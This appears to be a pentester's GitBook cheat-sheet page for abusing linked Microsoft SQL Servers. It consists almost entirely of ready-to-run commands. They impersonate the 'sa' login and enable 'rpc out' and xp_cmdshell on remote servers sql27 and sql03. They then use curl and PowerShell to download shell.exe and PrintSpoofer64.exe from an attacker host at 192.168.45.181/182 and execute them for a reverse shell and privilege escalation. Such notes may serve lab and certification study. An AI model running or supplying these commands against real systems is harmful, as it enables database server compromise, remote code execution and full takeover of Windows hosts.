All Gitbook

SQL

SELECT is_srvrolemember('sysadmin');

#if shows linked server no mapping on remote
EXEC sp_helplinkedsrvlogin;  #check mapping
EXECUTE AS LOGIN = 'sa'; # login as that mapped user

#if no rpc out
exec sp_serveroption @server='SQL03', @optname='rpc out', @optvalue='TRUE'; 
######

EXEC sp_linkedservers; # check linked server

EXEC ('SELECT SYSTEM_USER;') AT sql27;
EXEC ('SELECT USER_NAME();') AT sql27;


EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT sql27;
EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT sql27;

EXEC ('xp_cmdshell ''whoami'';') AT sql27;

EXEC ('xp_cmdshell "curl 192.168.45.181/shell.exe > C:/windows/tasks/shell.exe";') AT sql03;
EXEC ('xp_cmdshell "C:/windows/tasks/shell.exe";') AT sql03;

####
EXEC ('xp_cmdshell "curl 192.168.45.181/PrintSpoofer64.exe > C:/windows/tasks/ps.exe";') AT sql03;
EXEC ('xp_cmdshell "C:/windows/tasks/ps.exe -c C:/windows/tasks/shell.exe";') AT sql03;

####
EXEC ('xp_cmdshell "
powershell -c IWR -Uri http://192.168.45.182/shell.exe -OutFile C:\users\public\downloads\shell.exe";') AT sql27;
EXEC ('xp_cmdshell "C:\users\public\downloads\shell.exe";') AT sql27;
PreviousEscalationNextLinked SQL Servers

Last updated